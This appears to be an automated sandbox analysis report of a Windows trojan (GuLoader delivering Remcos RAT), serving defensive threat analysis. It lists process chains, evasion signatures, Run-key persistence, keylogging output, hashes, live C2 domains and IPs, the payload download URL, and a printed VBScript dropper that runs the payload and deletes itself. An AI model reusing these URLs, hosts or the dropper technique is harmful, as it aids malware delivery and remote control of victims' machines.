            Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.GenericKD.46442270.25635.exeProcess created: C:\Windows\SysWOW64\wscript.exe 'C:\Windows\System32\WScript.exe' 'C:\Users\user\AppData\Local\Temp\install.vbs'
            Source: C:\Windows\SysWOW64\wscript.exeProcess created: C:\Windows\SysWOW64\cmd.exe 'C:\Windows\System32\cmd.exe' /c 'C:\Users\user\AppData\Roaming\win.exe'
            Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Users\user\AppData\Roaming\win.exe C:\Users\user\AppData\Roaming\win.exe
            Source: C:\Users\user\AppData\Roaming\win.exeProcess created: C:\Users\user\AppData\Roaming\win.exe C:\Users\user\AppData\Roaming\win.exe
            Source: C:\Users\user\AppData\Roaming\win.exeProcess created: C:\Users\user\AppData\Roaming\win.exe 'C:\Users\user\AppData\Roaming\win.exe'
            Source: C:\Users\user\AppData\Roaming\win.exeProcess created: C:\Users\user\AppData\Roaming\win.exe 'C:\Users\user\AppData\Roaming\win.exe'
            Source: win.exe, 00000017.00000002.846839405.00000000023B7000.00000004.00000040.sdmpBinary or memory string: Program Manager
            Source: win.exe, 00000017.00000002.846839405.00000000023B7000.00000004.00000040.sdmpBinary or memory string: Program Manager Started
            Source: win.exe, 00000017.00000002.846699233.0000000000E80000.00000002.00000001.sdmpBinary or memory string: Shell_TrayWnd
            Source: win.exe, 00000017.00000002.846699233.0000000000E80000.00000002.00000001.sdmpBinary or memory string: Progman
            Source: win.exe, 00000017.00000002.846839405.00000000023B7000.00000004.00000040.sdmpBinary or memory string: Program Managerer ]
            Source: logs.dat.23.drBinary or memory string: [ Program Manager ]
            Source: win.exe, 00000017.00000002.846699233.0000000000E80000.00000002.00000001.sdmpBinary or memory string: &Program Manager
            Source: win.exe, 00000017.00000002.846699233.0000000000E80000.00000002.00000001.sdmpBinary or memory string: Progmanlock
            Source: win.exe, 00000017.00000002.846839405.00000000023B7000.00000004.00000040.sdmpBinary or memory string: Program Manager&Hmg
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.GenericKD.46442270.25635.exeCode function: 0_2_020B9FF7 cpuid
            Source: C:\Windows\SysWOW64\cmd.exeQueries volume information: C:\ VolumeInformation
            Source: C:\Windows\System32\backgroundTaskHost.exeQueries volume information: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\LocalState\TargetedContentCache\v3\338387 VolumeInformation
            Source: C:\Windows\System32\backgroundTaskHost.exeQueries volume information: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\LocalState\TargetedContentCache\v3\338387\c20d61befcda487dbc17044b70fd3bfd_1 VolumeInformation
            Source: C:\Windows\System32\backgroundTaskHost.exeQueries volume information: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\LocalState\TargetedContentCache\v3\338387\d572bee68d954d8f906b98a2e017f820_1 VolumeInformation
            Source: C:\Windows\SysWOW64\wscript.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

            Stealing of Sensitive Information:

            barindex
            Yara detected Remcos RATShow sources
            Source: Yara matchFile source: 00000017.00000002.846829596.00000000023B0000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: Process Memory Space: win.exe PID: 2796, type: MEMORY

            Remote Access Functionality:

            barindex
            Yara detected Remcos RATShow sources
            Source: Yara matchFile source: 00000017.00000002.846829596.00000000023B0000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: Process Memory Space: win.exe PID: 2796, type: MEMORY

            Mitre Att&ck Matrix

            Initial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionExfiltrationCommand and ControlNetwork EffectsRemote Service EffectsImpact
            Valid AccountsScripting11Registry Run Keys / Startup Folder1Process Injection12Masquerading11OS Credential DumpingQuery Registry1Remote ServicesArchive Collected Data1Exfiltration Over Other Network MediumEncrypted Channel1Eavesdrop on Insecure Network CommunicationRemotely Track Device Without AuthorizationModify System Partition
            Default AccountsScheduled Task/JobBoot or Logon Initialization ScriptsRegistry Run Keys / Startup Folder1Virtualization/Sandbox Evasion23LSASS MemorySecurity Software Discovery631Remote Desktop ProtocolData from Removable MediaExfiltration Over BluetoothIngress Tool Transfer2Exploit SS7 to Redirect Phone Calls/SMSRemotely Wipe Data Without AuthorizationDevice Lockout
            Domain AccountsAt (Linux)Logon Script (Windows)Logon Script (Windows)Process Injection12Security Account ManagerVirtualization/Sandbox Evasion23SMB/Windows Admin SharesData from Network Shared DriveAutomated ExfiltrationNon-Application Layer Protocol2Exploit SS7 to Track Device LocationObtain Device Cloud BackupsDelete Device Data
            Local AccountsAt (Windows)Logon Script (Mac)Logon Script (Mac)Scripting11NTDSProcess Discovery1Distributed Component Object ModelInput CaptureScheduled TransferApplication Layer Protocol112SIM Card SwapCarrier Billing Fraud
            Cloud AccountsCronNetwork Logon ScriptNetwork Logon ScriptObfuscated Files or Information1LSA SecretsApplication Window Discovery1SSHKeyloggingData Transfer Size LimitsFallback ChannelsManipulate Device CommunicationManipulate App Store Rankings or Ratings
            Replication Through Removable MediaLaunchdRc.commonRc.commonSteganographyCached Domain CredentialsRemote System Discovery1VNCGUI Input CaptureExfiltration Over C2 ChannelMultiband CommunicationJamming or Denial of ServiceAbuse Accessibility Features
            External Remote ServicesScheduled TaskStartup ItemsStartup ItemsCompile After DeliveryDCSyncFile and Directory Discovery1Windows Remote ManagementWeb Portal CaptureExfiltration Over Alternative ProtocolCommonly Used PortRogue Wi-Fi Access PointsData Encrypted for Impact
            Drive-by CompromiseCommand and Scripting InterpreterScheduled Task/JobScheduled Task/JobIndicator Removal from ToolsProc FilesystemSystem Information Discovery322Shared WebrootCredential API HookingExfiltration Over Symmetric Encrypted Non-C2 ProtocolApplication Layer ProtocolDowngrade to Insecure ProtocolsGenerate Fraudulent Advertising Revenue

            Behavior Graph

            Hide Legend

            Legend:

            • Process
            • Signature
            • Created File
            • DNS/IP Info
            • Is Dropped
            • Is Windows Process
            • Number of created Registry Values
            • Number of created Files
            • Visual Basic
            • Delphi
            • Java
            • .Net C# or VB.NET
            • C, C++ or other language
            • Is malicious
            • Internet
            behaviorgraph top1 signatures2 2 Behavior Graph ID: 430707 Sample: SecuriteInfo.com.Trojan.Gen... Startdate: 07/06/2021 Architecture: WINDOWS Score: 96 63 Found malware configuration 2->63 65 Yara detected GuLoader 2->65 67 Yara detected Remcos RAT 2->67 69 3 other signatures 2->69 10 SecuriteInfo.com.Trojan.GenericKD.46442270.25635.exe 2 2->10         started        13 win.exe 1 2->13         started        15 win.exe 1 2->15         started        process3 signatures4 79 Contains functionality to detect hardware virtualization (CPUID execution measurement) 10->79 81 Detected RDTSC dummy instruction sequence (likely for instruction hammering) 10->81 83 Tries to detect Any.run 10->83 85 Tries to detect virtualization through RDTSC time measurements 10->85 17 SecuriteInfo.com.Trojan.GenericKD.46442270.25635.exe 4 10 10->17         started        22 backgroundTaskHost.exe 22 10 10->22         started        87 Hides threads from debuggers 13->87 24 win.exe 6 13->24         started        26 win.exe 6 15->26         started        process5 dnsIp6 47 ztechinternational.com 192.185.113.219, 49732, 49753, 49754 UNIFIEDLAYER-AS-1US United States 17->47 41 C:\Users\user\AppData\Roaming\win.exe, PE32 17->41 dropped 43 C:\Users\user\...\win.exe:Zone.Identifier, ASCII 17->43 dropped 45 C:\Users\user\AppData\Local\...\install.vbs, data 17->45 dropped 71 Tries to detect Any.run 17->71 73 Hides threads from debuggers 17->73 28 wscript.exe 1 17->28         started        file7 signatures8 process9 process10 30 cmd.exe 1 28->30         started        process11 32 win.exe 1 30->32         started        35 conhost.exe 30->35         started        signatures12 55 Contains functionality to detect hardware virtualization (CPUID execution measurement) 32->55 57 Detected RDTSC dummy instruction sequence (likely for instruction hammering) 32->57 59 Tries to detect Any.run 32->59 61 2 other signatures 32->61 37 win.exe 2 7 32->37         started        process13 dnsIp14 49 ztechinternational.com 37->49 51 hjduiebcvzcalpmjdbcnwqadhsiybcnzxswedgap.ydns.eu 172.94.125.152, 2024 M247GB United States 37->51 53 192.168.2.1 unknown unknown 37->53 75 Tries to detect Any.run 37->75 77 Hides threads from debuggers 37->77 signatures15

            Screenshots

            Thumbnails

            This section contains all screenshots as thumbnails, including those not shown in the slideshow.

            windows-stand

            Antivirus, Machine Learning and Genetic Malware Detection

            Initial Sample

            SourceDetectionScannerLabelLink
            SecuriteInfo.com.Trojan.GenericKD.46442270.25635.exe6%ReversingLabsWin32.Trojan.Vebzenpak

            Dropped Files

            SourceDetectionScannerLabelLink
            C:\Users\user\AppData\Roaming\win.exe6%ReversingLabsWin32.Trojan.Vebzenpak

            Unpacked PE Files

            No Antivirus matches

            Domains

            No Antivirus matches

            URLs

            SourceDetectionScannerLabelLink
            http://ztechinternational.com/dk/Jice_remcos%202_vOOXAzQx82.bin0%Avira URL Cloudsafe

            Domains and IPs

            Contacted Domains

            NameIPActiveMaliciousAntivirus DetectionReputation
            hjduiebcvzcalpmjdbcnwqadhsiybcnzxswedgap.ydns.eu
            		172.94.125.152
            		truefalse
              		unknown
              ztechinternational.com
              		192.185.113.219
              		truetrue
                		unknown

                Contacted URLs

                NameMaliciousAntivirus DetectionReputation
                http://ztechinternational.com/dk/Jice_remcos%202_vOOXAzQx82.bintrue
                • Avira URL Cloud: safe
                		unknown

                Contacted IPs

                • No. of IPs < 25%
                • 25% < No. of IPs < 50%
                • 50% < No. of IPs < 75%
                • 75% < No. of IPs

                Public

                IPDomainCountryFlagASNASN NameMalicious
                192.185.113.219
                		ztechinternational.comUnited States
                		46606UNIFIEDLAYER-AS-1UStrue
                172.94.125.152
                		hjduiebcvzcalpmjdbcnwqadhsiybcnzxswedgap.ydns.euUnited States
                		9009M247GBfalse

                Private

                IP
                192.168.2.1

                General Information

                Joe Sandbox Version:32.0.0 Black Diamond
                Analysis ID:430707
                Start date:07.06.2021
                Start time:20:41:45
                Joe Sandbox Product:CloudBasic
                Overall analysis duration:0h 10m 41s
                Hypervisor based Inspection enabled:false
                Report type:light
                Sample file name:SecuriteInfo.com.Trojan.GenericKD.46442270.25635.17664 (renamed file extension from 17664 to exe)
                Cookbook file name:default.jbs
                Analysis system description:Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 85, IE 11, Adobe Reader DC 19, Java 8 Update 211
                Number of analysed new started processes analysed:27
                Number of new started drivers analysed:0
                Number of existing processes analysed:0
                Number of existing drivers analysed:0
                Number of injected processes analysed:0
                Technologies:
                • HCA enabled
                • EGA enabled
                • HDC enabled
                • AMSI enabled
                Analysis Mode:default
                Analysis stop reason:Timeout
                Detection:MAL
                Classification:mal96.troj.evad.winEXE@19/10@9/3
                EGA Information:Failed
                HDC Information:
                • Successful, ratio: 3.5% (good quality ratio 0.6%)
                • Quality average: 11.4%
                • Quality standard deviation: 27.1%
                HCA Information:
                • Successful, ratio: 70%
                • Number of executed functions: 0
                • Number of non-executed functions: 0
                Cookbook Comments:
                • Adjust boot time
                • Enable AMSI
                • Override analysis time to 240s for sample files taking high CPU consumption
                Warnings:
                Show All
                • Exclude process from analysis (whitelisted): MpCmdRun.exe, audiodg.exe, BackgroundTransferHost.exe, WMIADAP.exe, backgroundTaskHost.exe, conhost.exe, svchost.exe, wuapihost.exe
                • TCP Packets have been reduced to 100
                • Excluded IPs from analysis (whitelisted): 204.79.197.200, 13.107.21.200, 168.61.161.212, 13.64.90.137, 13.88.21.125, 104.42.151.234, 20.82.210.154, 2.20.142.210, 2.20.142.209, 52.155.217.156, 20.54.26.129, 92.122.213.194, 92.122.213.247, 23.57.80.111
                • Excluded domains from analysis (whitelisted): au.download.windowsupdate.com.edgesuite.net, iris-de-prod-azsc-neu-b.northeurope.cloudapp.azure.com, a1449.dscg2.akamai.net, fs-wildcard.microsoft.com.edgekey.net, fs-wildcard.microsoft.com.edgekey.net.globalredir.akadns.net, arc.msn.com, consumerrp-displaycatalog-aks2eap-europe.md.mp.microsoft.com.akadns.net, db5eap.displaycatalog.md.mp.microsoft.com.akadns.net, www-bing-com.dual-a-0001.a-msedge.net, audownload.windowsupdate.nsatc.net, arc.trafficmanager.net, displaycatalog.mp.microsoft.com, watson.telemetry.microsoft.com, img-prod-cms-rt-microsoft-com.akamaized.net, prod.fs.microsoft.com.akadns.net, au-bg-shim.trafficmanager.net, www.bing.com, displaycatalog-europeeap.md.mp.microsoft.com.akadns.net, skypedataprdcolwus17.cloudapp.net, fs.microsoft.com, dual-a-0001.a-msedge.net, displaycatalog-rp-europe.md.mp.microsoft.com.akadns.net, ris-prod.trafficmanager.net, skypedataprdcolcus17.cloudapp.net, ctldl.windowsupdate.com, e1723.g.akamaiedge.net, a767.dscg3.akamai.net, ris.api.iris.microsoft.com, a-0001.a-afdentry.net.trafficmanager.net, blobcollector.events.data.trafficmanager.net, skypedataprdcolwus15.cloudapp.net, skypedataprdcolwus16.cloudapp.net, displaycatalog-rp.md.mp.microsoft.com.akadns.net
                • Not all processes where analyzed, report is missing behavior information
                • Report size exceeded maximum capacity and may have missing behavior information.
                • Report size exceeded maximum capacity and may have missing disassembly code.
                • Report size getting too big, too many NtOpenKeyEx calls found.
                • Report size getting too big, too many NtProtectVirtualMemory calls found.
                • Report size getting too big, too many NtQueryValueKey calls found.
                • VT rate limit hit for: /opt/package/joesandbox/database/analysis/430707/sample/SecuriteInfo.com.Trojan.GenericKD.46442270.25635.exe

                Simulations

                Behavior and APIs

                TimeTypeDescription
                20:43:36AutostartRun: HKCU\Software\Microsoft\Windows\CurrentVersion\Run win "C:\Users\user\AppData\Roaming\win.exe"
                20:43:44AutostartRun: HKCU64\Software\Microsoft\Windows\CurrentVersion\Run win "C:\Users\user\AppData\Roaming\win.exe"
                20:45:08API Interceptor775x Sleep call for process: win.exe modified

                Joe Sandbox View / Context

                IPs

                MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                192.185.113.219SecuriteInfo.com.__vbaHresultCheckObj.9138.exeGet hashmaliciousBrowse
                • ztechinternational.com/dk/Ose_2021%20remcos_UsrkxBzfYJ78.bin
                MLJ.exeGet hashmaliciousBrowse
                • ztechinternational.com/dk/Maily%20_remcos_poYYVI175.bin

                Domains

                MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                hjduiebcvzcalpmjdbcnwqadhsiybcnzxswedgap.ydns.euuFLbcEn9qq.xlsxGet hashmaliciousBrowse
                • 172.94.125.184
                b20e3f39_by_Libranalysis.exeGet hashmaliciousBrowse
                • 172.94.125.102
                f4b56009_by_Libranalysis.exeGet hashmaliciousBrowse
                • 46.243.140.90
                49481a54_by_Libranalysis.exeGet hashmaliciousBrowse
                • 46.243.140.90
                INTRZGw3ev.exeGet hashmaliciousBrowse
                • 46.243.140.66
                LMKQB8tQQ2.exeGet hashmaliciousBrowse
                • 10.4.78.10
                SecuriteInfo.com.Generic.mg.80f76c27257e6f3e.exeGet hashmaliciousBrowse
                • 172.94.37.30
                ztechinternational.comSecuriteInfo.com.__vbaHresultCheckObj.9138.exeGet hashmaliciousBrowse
                • 192.185.113.219
                MLJ.exeGet hashmaliciousBrowse
                • 192.185.113.219

                ASN

                MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                M247GBMLJ.exeGet hashmaliciousBrowse
                • 46.243.233.25
                CN-Invoice-XXXXX9808-1901114328710090.pdf.exeGet hashmaliciousBrowse
                • 217.138.212.59
                PO-13916.jpeg.exeGet hashmaliciousBrowse
                • 217.138.212.59
                6NcvrNwxSh.exeGet hashmaliciousBrowse
                • 46.243.237.125
                FcMJC6EWgP.exeGet hashmaliciousBrowse
                • 104.250.182.36
                CLAVIS INVESTMENTS.xlsxGet hashmaliciousBrowse
                • 104.250.182.19
                PO1223.exeGet hashmaliciousBrowse
                • 37.120.210.211
                DHL On Demand Delivery.exeGet hashmaliciousBrowse
                • 217.138.212.59
                DHL On Demand Delivery.pdf.exeGet hashmaliciousBrowse
                • 217.138.212.59
                uFLbcEn9qq.xlsxGet hashmaliciousBrowse
                • 172.94.125.184
                payment.PDF.vbsGet hashmaliciousBrowse
                • 46.243.237.31
                b20e3f39_by_Libranalysis.exeGet hashmaliciousBrowse
                • 172.94.125.102
                pKDw1bLc83.exeGet hashmaliciousBrowse
                • 46.243.248.60
                New Items RFQ & Specifications Revised_20210520.exeGet hashmaliciousBrowse
                • 195.206.105.10
                WixdbcV8At.exeGet hashmaliciousBrowse
                • 45.141.152.194
                67e197ce_by_Libranalysis.exeGet hashmaliciousBrowse
                • 188.72.119.8
                f4b56009_by_Libranalysis.exeGet hashmaliciousBrowse
                • 46.243.140.90
                49481a54_by_Libranalysis.exeGet hashmaliciousBrowse
                • 46.243.140.90
                CN-Invoice-XXXXX9808-190111432871000.pdf.exeGet hashmaliciousBrowse
                • 217.138.212.59
                Quotation_05082021 pdf.exeGet hashmaliciousBrowse
                • 95.215.225.23
                UNIFIEDLAYER-AS-1USSecuriteInfo.com.__vbaHresultCheckObj.9138.exeGet hashmaliciousBrowse
                • 192.185.113.219
                MLJ.exeGet hashmaliciousBrowse
                • 192.185.113.219
                LEMOH.exeGet hashmaliciousBrowse
                • 162.241.219.209
                03062021.exeGet hashmaliciousBrowse
                • 162.241.253.69
                Shipment documents.exeGet hashmaliciousBrowse
                • 192.185.190.186
                statistic-608048546.xlsGet hashmaliciousBrowse
                • 192.185.225.204
                statistic-608048546.xlsGet hashmaliciousBrowse
                • 192.185.225.204
                AHG QUOTE pdf 76530.exeGet hashmaliciousBrowse
                • 192.185.41.225
                Invoice number FV0062022020.exeGet hashmaliciousBrowse
                • 74.220.199.6
                Payment slip.exeGet hashmaliciousBrowse
                • 50.87.170.32
                SOA_Outstanding_Balance.exeGet hashmaliciousBrowse
                • 192.185.129.69
                RFQ K1062 PROJECT.exeGet hashmaliciousBrowse
                • 162.241.27.245
                ] New Order Vung Ang TPP Viet Nam.exeGet hashmaliciousBrowse
                • 192.185.20.31
                oVA5JBAJutcna88.exeGet hashmaliciousBrowse
                • 50.87.253.188
                a8eC6O6okf.exeGet hashmaliciousBrowse
                • 50.87.146.99
                oNUUaugLQjvRcCL.exeGet hashmaliciousBrowse
                • 50.87.151.118
                CAS No. 584-84-9.exeGet hashmaliciousBrowse
                • 162.144.13.239
                CAS No. 9004-65-3.exeGet hashmaliciousBrowse
                • 162.144.13.239
                02357#U260eThomas#Ud83d#Udce0.HTMGet hashmaliciousBrowse
                • 192.185.198.10
                6dTTv9IdCw.exeGet hashmaliciousBrowse
                • 74.220.199.8

                JA3 Fingerprints

                No context

                Dropped Files

                No context

                Created / dropped Files

                C:\Users\user\AppData\Local\Packages\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\LocalState\TargetedContentCache\v3\338387\c20d61befcda487dbc17044b70fd3bfd_1.~tmp
                Process:C:\Windows\System32\backgroundTaskHost.exe
                File Type:UTF-8 Unicode text, with very long lines, with no line terminators
                Category:dropped
                Size (bytes):9472
                Entropy (8bit):5.648577726443805
                Encrypted:false
                SSDEEP:192:TMXLpAvK70mJtlHB5tHyIyo0HyIz2sEHyI+t:O5BrCaRA
                MD5:85D06071360BFD61E25CB454BC3D9A52
                SHA1:950C8BB32046385EC5924E742A0626F4FE33905C
                SHA-256:FF30FCDBC0BC021882B324869C6F642FEF4C5E2F4F1FF50265869459C4B4A0CE
                SHA-512:996E2DDD56A39119310235F30AF0B0E94F9598D2E1FCE417C90EA1DAA4D2CC61A38F1A38239EB4F9D6B18B0A7B8B94C1C0119A8C950E6D6548548CAFA0A48863
                Malicious:false
                Reputation:low
                Preview: {"class":"content","collections":[],"name":"LockScreen","propertyManifest":{"landscapeImage":{"type":"image"},"portraitImage":{"type":"image"},"showImageOnSecureLock":{"isOptional":true,"type":"boolean"},"onRender":{"type":"action"}},"properties":{"landscapeImage":{"fileSize":619870,"height":1080,"sha256":"Sjoon1DPT2frxCE4x8+n/eInIBto1+Bqa2+yCIAGsnE=","width":1920,"image":"C:\\Users\\user\\AppData\\Local\\Packages\\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\\LocalState\\Assets\\802718d3cf4e06d977a7ce89b9b5b059961bd30dd185cfc85d50f4b517d86888"},"portraitImage":{"fileSize":541306,"height":1920,"sha256":"5J1QvtZQvTAkpjdIGXZjpmwft0txV5oWHNifdjQq+SA=","width":1080,"image":"C:\\Users\\user\\AppData\\Local\\Packages\\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\\LocalState\\Assets\\afece1b8b7bbd157a59a74a90e4894314c82accd9b3076dfe8ee636d610fcafb"},"showImageOnSecureLock":{"bool":true},"onRender":{"event":"none","parameters":{"ctx.action":"setLockScreenHotspots","
                C:\Users\user\AppData\Local\Packages\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\LocalState\TargetedContentCache\v3\338387\d572bee68d954d8f906b98a2e017f820_1.~tmp
                Process:C:\Windows\System32\backgroundTaskHost.exe
                File Type:UTF-8 Unicode text, with very long lines, with no line terminators
                Category:dropped
                Size (bytes):9626
                Entropy (8bit):5.620324379710843
                Encrypted:false
                SSDEEP:192:8Wo0fhWWozjAvKZph/DtlHB5WHyPWhuBHyerhOt9HyTYr:LfhJ0hVohuhkr
                MD5:B48D9564B458B043EA568C06C3E8DD00
                SHA1:317E35E4D15A036F1A5EB88BDB0467B3142AB1C9
                SHA-256:DEF2CBC831437E6C49048AF0A85E0FBD5E533C040309F92293A2554CADCFD03A
                SHA-512:BBA8D250145080CC6AAE568FB66E5346C7B5E5C366F36E74A039733CF64832294B1DFF9EBAE191375ED00AA3612ECDD2F206F6B105127735D0FA8210DC936460
                Malicious:false
                Reputation:low
                Preview: {"class":"content","collections":[],"name":"LockScreen","propertyManifest":{"landscapeImage":{"type":"image"},"portraitImage":{"type":"image"},"showImageOnSecureLock":{"isOptional":true,"type":"boolean"},"onRender":{"type":"action"}},"properties":{"landscapeImage":{"fileSize":556406,"height":1080,"sha256":"CY3KzKVHdoTu7NbePjx+CQPZn53417ZCdtczfhQp7ag=","width":1920,"image":"C:\\Users\\user\\AppData\\Local\\Packages\\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\\LocalState\\Assets\\c6f553ef401df1783242a6b5e23dca6ee2b1ba33f2a7e7f4d621fd5e77abb22b"},"portraitImage":{"fileSize":596086,"height":1920,"sha256":"/oiuOOD/NM0Qccsss/nuHFdUzMCaXUgbKXyyTwXRIpY=","width":1080,"image":"C:\\Users\\user\\AppData\\Local\\Packages\\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\\LocalState\\Assets\\d496c712e078cb44236edd3e8ea0055ee21cb66c3c7ce5ec90fb916e48dea486"},"showImageOnSecureLock":{"bool":true},"onRender":{"event":"none","parameters":{"ctx.action":"setLockScreenHotspots","
                C:\Users\user\AppData\Local\Temp\install.vbs
                Process:C:\Users\user\Desktop\SecuriteInfo.com.Trojan.GenericKD.46442270.25635.exe
                File Type:data
                Category:modified
                Size (bytes):404
                Entropy (8bit):3.476487137149483
                Encrypted:false
                SSDEEP:12:4D8o++ugypjBQMBvFQ4lOAMJnAGF0M/0aimi:4Dh+S0FNOj7F0Nait
                MD5:0AC72B36AE19DF5DD84381E07A64BA3B
                SHA1:194801CB7059E67ABF5A38E709D856A8095A71EE
                SHA-256:B17BD1B45A2144EAA120C3EE9BB97622B2A54B0D36A69B3750AF2678D359D14D
                SHA-512:DA76EC5A6C11DE83532AED125DF88B43BABD72774EC8A91C05697E4941F9C8DB2757402787C40EB08DFD82A0927A8A301F84FEE5EDE10D2DB56CC7B0BB429604
                Malicious:true
                Reputation:moderate, very likely benign file
                Preview: W.S.c.r.i.p.t...S.l.e.e.p. .1.0.0.0...S.e.t. .f.s.o. .=. .C.r.e.a.t.e.O.b.j.e.c.t.(.".S.c.r.i.p.t.i.n.g...F.i.l.e.S.y.s.t.e.m.O.b.j.e.c.t.".)...C.r.e.a.t.e.O.b.j.e.c.t.(.".W.S.c.r.i.p.t...S.h.e.l.l.".)...R.u.n. .".c.m.d. ./.c. .".".C.:.\.U.s.e.r.s.\.e.n.g.i.n.e.e.r.\.A.p.p.D.a.t.a.\.R.o.a.m.i.n.g.\.w.i.n...e.x.e.".".".,. .0...f.s.o...D.e.l.e.t.e.F.i.l.e.(.W.s.c.r.i.p.t...S.c.r.i.p.t.F.u.l.l.N.a.m.e.).
                C:\Users\user\AppData\Roaming\logs.dat
                Process:C:\Users\user\AppData\Roaming\win.exe
                File Type:ASCII text, with CRLF line terminators
                Category:dropped
                Size (bytes):74
                Entropy (8bit):4.733300752387368
                Encrypted:false
                SSDEEP:3:ttUbV26rA4RXMRPHv31aeo:tmbXqdHv3IP
                MD5:4F44B12133FC55DA5016BABB674C756B
                SHA1:64B014DFF9B1A53ED1280E25D39977D007EB75B0
                SHA-256:E758FA16613EDE36575D3BC67FD9BCF8CF17AFF54003D45134CB3F5EBE6E100D
                SHA-512:38E69085470098AD5DCA565C10ADF731DB7854892D6FA4E117384B481345195B9021E2AA42FF98BB1903D84254A530F9CEBADA998D0C6380F2A0F38F617DC15C
                Malicious:false
                Reputation:low
                Preview: ..[2021/06/07 20:45:08 Offline Keylogger Started]....[ Program Manager ]..
                C:\Users\user\AppData\Roaming\win.exe
                Process:C:\Users\user\Desktop\SecuriteInfo.com.Trojan.GenericKD.46442270.25635.exe
                File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                Category:dropped
                Size (bytes):110592
                Entropy (8bit):6.215185448028134
                Encrypted:false
                SSDEEP:3072:BCCFP2asIcR50gY4K+xWqEfGBpQ2JyB92mTZP9dsodxlxXuWcwZdZywBMxO8NJ:B3Bry+gY4DxWqEfGBpQ2JyB92mTZP9d0
                MD5:853744502B68E50E6CBAF81FFB3F5CC0
                SHA1:EA748BAEBE70D7C6D3DA9D1A2A34B76051425962
                SHA-256:8115607710C35C78EDA8DD16D73CAB92E2C857D8C91EB1422FCC1B3F06835A4A
                SHA-512:5B12B465E6F964F7280359546D42676A9A8B2C221568F4D4EE849F0E759E9DB59F5A43BF648E37C3878558142A1EB926331127606F78FC601DD8B69AC4D089F1
                Malicious:true
                Antivirus:
                • Antivirus: ReversingLabs, Detection: 6%
                Reputation:low
                Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........#...B...B...B..L^...B...`...B...d...B..Rich.B..........PE..L...0.>Z.....................0....................@..................................-......................................t...(...........................................................................(... ....................................text...8|.......................... ..`.data...............................@....rsrc...............................@..@...I............MSVBVM60.DLL....................................................................................................................................................................................................................................................................................................................................................................................................................................
                C:\Users\user\AppData\Roaming\win.exe:Zone.Identifier
                Process:C:\Users\user\Desktop\SecuriteInfo.com.Trojan.GenericKD.46442270.25635.exe
                File Type:ASCII text, with CRLF line terminators
                Category:dropped
                Size (bytes):26
                Entropy (8bit):3.95006375643621
                Encrypted:false
                SSDEEP:3:ggPYV:rPYV
                MD5:187F488E27DB4AF347237FE461A079AD
                SHA1:6693BA299EC1881249D59262276A0D2CB21F8E64
                SHA-256:255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
                SHA-512:89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
                Malicious:true
                Preview: [ZoneTransfer]....ZoneId=0
                C:\Windows\Lwo7
                Process:C:\Users\user\AppData\Roaming\win.exe
                File Type:ASCII text, with CRLF line terminators
                Category:modified
                Size (bytes):56
                Entropy (8bit):3.521640636343319
                Encrypted:false
                SSDEEP:3:RRQRRQRRQRRQn:qQQS
                MD5:A0C9E601546791A2A273DEAC8256A3E5
                SHA1:4014E6DD93022436BEB51DFB32BDF995542C3942
                SHA-256:77F928BAFA7CCBF6071DD1DC877C30D5C9E1380F53F31A7283AE769B0C9BE20D
                SHA-512:7F19CBF8F2D17B6632E4CAB562F6936EB791D1738C93A83CC61E4470780B84DCBFDB4D935324474CC0665882A04EA64FABF25DA2405263C7A668FD1B42CFD4F7
                Malicious:false
                Preview: Chittamwood3..Chittamwood3..Chittamwood3..Chittamwood3..

                Static File Info

                General

                File type:PE32 executable (GUI) Intel 80386, for MS Windows
                Entropy (8bit):6.215185448028134
                TrID:
                • Win32 Executable (generic) a (10002005/4) 99.15%
                • Win32 Executable Microsoft Visual Basic 6 (82127/2) 0.81%
                • Generic Win/DOS Executable (2004/3) 0.02%
                • DOS Executable Generic (2002/1) 0.02%
                • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                File name:SecuriteInfo.com.Trojan.GenericKD.46442270.25635.exe
                File size:110592
                MD5:853744502b68e50e6cbaf81ffb3f5cc0
                SHA1:ea748baebe70d7c6d3da9d1a2a34b76051425962
                SHA256:8115607710c35c78eda8dd16d73cab92e2c857d8c91eb1422fcc1b3f06835a4a
                SHA512:5b12b465e6f964f7280359546d42676a9a8b2c221568f4d4ee849f0e759e9db59f5a43bf648e37c3878558142a1eb926331127606f78fc601dd8b69ac4d089f1
                SSDEEP:3072:BCCFP2asIcR50gY4K+xWqEfGBpQ2JyB92mTZP9dsodxlxXuWcwZdZywBMxO8NJ:B3Bry+gY4DxWqEfGBpQ2JyB92mTZP9d0
                File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........#...B...B...B..L^...B...`...B...d...B..Rich.B..........PE..L...0.>Z.....................0....................@................

                File Icon

                Icon Hash:2828bae9d2777576

                Static PE Info

                General

                Entrypoint:0x4015d0
                Entrypoint Section:.text
                Digitally signed:false
                Imagebase:0x400000
                Subsystem:windows gui
